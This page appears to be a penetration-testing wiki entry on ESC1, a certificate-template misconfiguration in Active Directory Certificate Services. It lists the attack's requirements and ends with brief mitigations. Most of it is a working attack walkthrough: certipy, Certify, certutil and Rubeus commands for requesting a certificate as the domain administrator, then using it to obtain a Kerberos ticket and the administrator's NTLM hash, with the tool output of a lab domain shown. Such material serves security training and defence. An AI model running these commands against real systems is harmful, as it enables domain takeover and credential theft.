ESC1
Description
ESC1 is a privilege escalation vulnerability in certificate templates that allows any user with enrollment rights to supply a subjectAltName (SAN) for any other user or machine in Active Directory in the environment from the Certificate Authority (CA) , this allows the requesting user to receive a certificate for the targeted user and in turn, authenticate as them with the received certificate.
Requirements for attack path
ENROLLEE_SUPPLIES_SUBJECT flag in the certificate template
Enrollment rights granted to a user or group for which we have access to
Manager approval not enabled
Authorized signature are not required
Linux
Enumeration
certipy find -u 'Moe@Security.local' -p 'Password123' -dc-ip 10.10.10.100 -vulnerable -stdout

Performing the attack
certipy req -u 'moe@security.local' -p 'Password123' -dc-ip 10.10.10.100 -ca 'SECURITY-CA-CA' -target-ip 10.10.10.2 -template 'ESC1' -upn 'administrator@security.local' -sid S-1-5-21-13999771-2333344039-1820745628-500
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 51
[*] Got certificate with UPN 'administrator@security.local'
[*] Certificate object SID is 'S-1-5-21-13999771-2333344039-1820745628-500'
[*] Saved certificate and private key to 'administrator.pfx'
certipy auth -pfx administrator.pfx -username 'administrator' -domain 'security.local' -dc-ip 10.10.10.100
[*] Using principal: administrator@security.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@security.local': aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe
Windows
Enumeration
.\Certify.exe find /vulnerable /enabled /enrolleeSuppliesSubject

Performing the attack
Reuqest a certificate for the template vulnerable to ESC1 and specify a SAN for the user we wish to compromise (/altname:).
For accuracy and to avoid certificate mismatch issues we should always aim to provide the /sid parameter which should be the value of the UPN we are targeting (administrator@security.local in the example below).
.\Certify.exe request /ca:CA.SECURITY.LOCAL\SECURITY-CA-CA /template:ESC1 /altname:security\Administrator /sid:S-1-5-21-13999771-2333344039-1820745628-500
Take the private key and certificate output and place them into seperate files.
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAzyqzlf9NI2sbkAAiJ
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGeDCCBWCgAwIBAgITIwAAAFhhlVOMQ7
-----END CERTIFICATE-----
Then merge them together with certutil to create a .pfx file.
certutil -MergePFX .\cert.pem .\cert.pfx
Use the converted certificate file with Rubeus to either request a NTLM hash or a Kerberos TGT.
# Get NTLM Hash
.\Rubeus.exe asktgt /user:security\Administrator /certificate:admin.pfx /getcredentials
# Get TGT
.\Rubeus.exe asktgt /user:security\Administrator /certificate:admin.pfx /nowrap
< -- Snip -->
ServiceName : krbtgt/security
ServiceRealm : SECURITY.LOCAL
UserName : Administrator (NT_PRINCIPAL)
UserRealm : SECURITY.LOCAL
StartTime : 05/03/2025 18:06:36
EndTime : 06/03/2025 04:06:36
RenewTill : 12/03/2025 18:06:36
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : CpuuZvtyqrp9XO0V1OL/kg==
ASREP (key) : E7A981462C4B5115AB41BE5540D573E6
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : 2B576ACBE6BCFDA7294D6BD18041B8FE
Mitigations
Remove the ENROLLEE_SUPPLIES_SUBJECT flag from the certificate
Require manager aprovals on the certificate
Require authorized signatures
Remove weak enrollement permissions from the template
Last updated